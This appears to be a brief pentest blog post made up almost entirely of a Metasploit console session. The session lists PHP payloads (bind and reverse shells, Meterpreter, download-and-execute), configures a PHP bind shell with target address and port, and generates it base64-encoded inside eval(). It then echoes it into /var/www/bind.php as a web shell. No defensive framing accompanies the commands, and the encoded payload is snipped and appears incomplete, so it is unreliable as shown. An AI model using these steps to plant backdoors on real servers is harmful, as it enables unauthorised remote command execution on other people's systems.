Metasploit Shell php

1.  
2.  
3. _
4. | | o
5. _ _ _ _ _|_ __, , _ | | __ _|_
6. / |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
7. | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
8. /|
9. \|
10.  
11.  
12. =[ metasploit v3.5.2-beta [core:3.5 api:1.0]
13. + -- --=[ 644 exploits - 328 auxiliary
14. + -- --=[ 216 payloads - 27 encoders - 8 nops
15. =[ svn r11722 updated 4 days ago (2011.02.08)
16.  
17. msf > search php
18. [*] Searching loaded modules for pattern 'php'...
19. <--BIG SNIP-->
20. NOP Generators
21. ==============
22.  
23. Name Disclosure Date Rank Description
24. ---- --------------- ---- -----------
25. php/generic normal PHP Nop Generator
26.  
27.  
28. Payloads
29. ========
30.  
31. Name Disclosure Date Rank Description
32. ---- --------------- ---- -----------
33. php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
34. php/bind_php normal PHP Command Shell, Bind TCP (via php)
35. php/download_exec normal PHP Executable Download and Execute
36. php/exec normal PHP Execute Command
37. php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
38. php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
39. php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
40. php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
41. php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
42. php/shell_findsock normal PHP Command Shell, Find Sock
43.  
44. msf > use php/bind_php
45. msf payload(bind_php) > show options
46.  
47. Module options (payload/php/bind_php):
48.  
49. Name Current Setting Required Description
50. ---- --------------- -------- -----------
51. LPORT 4444 yes The listen port
52. RHOST no The target address
53.  
54. msf payload(bind_php) > set RHOST 192.168.1.5
55. RHOST => 192.168.1.5
56. msf payload(bind_php) > set LPORT 4321
57. LPORT => 4321
58. msf payload(bind_php) > generate -h
59. Usage: generate [options]
60.  
61. Generates a payload.
62.  
63. OPTIONS:
64.  
65. -E Force encoding.
66. -b <opt> The list of characters to avoid: '\x00\xff'
67. -e <opt> The name of the encoder module to use.
68. -f <opt> The output file name (otherwise stdout)
69. -h Help banner.
70. -i <opt> the number of encoding iterations.
71. -k Keep the template executable functional
72. -o <opt> A comma separated list of options in VAR=VAL format.
73. -p <opt> The Platform for output.
74. -s <opt> NOP sled length.
75. -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
76. -x <opt> The executable template to use
77.  
78. msf payload(bind_php) > generate -t raw -e php/base64
79. eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->
80. msf payload(bind_php) > exit
81.  
82. root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php
83.  
84. #pentest101.blogspot.com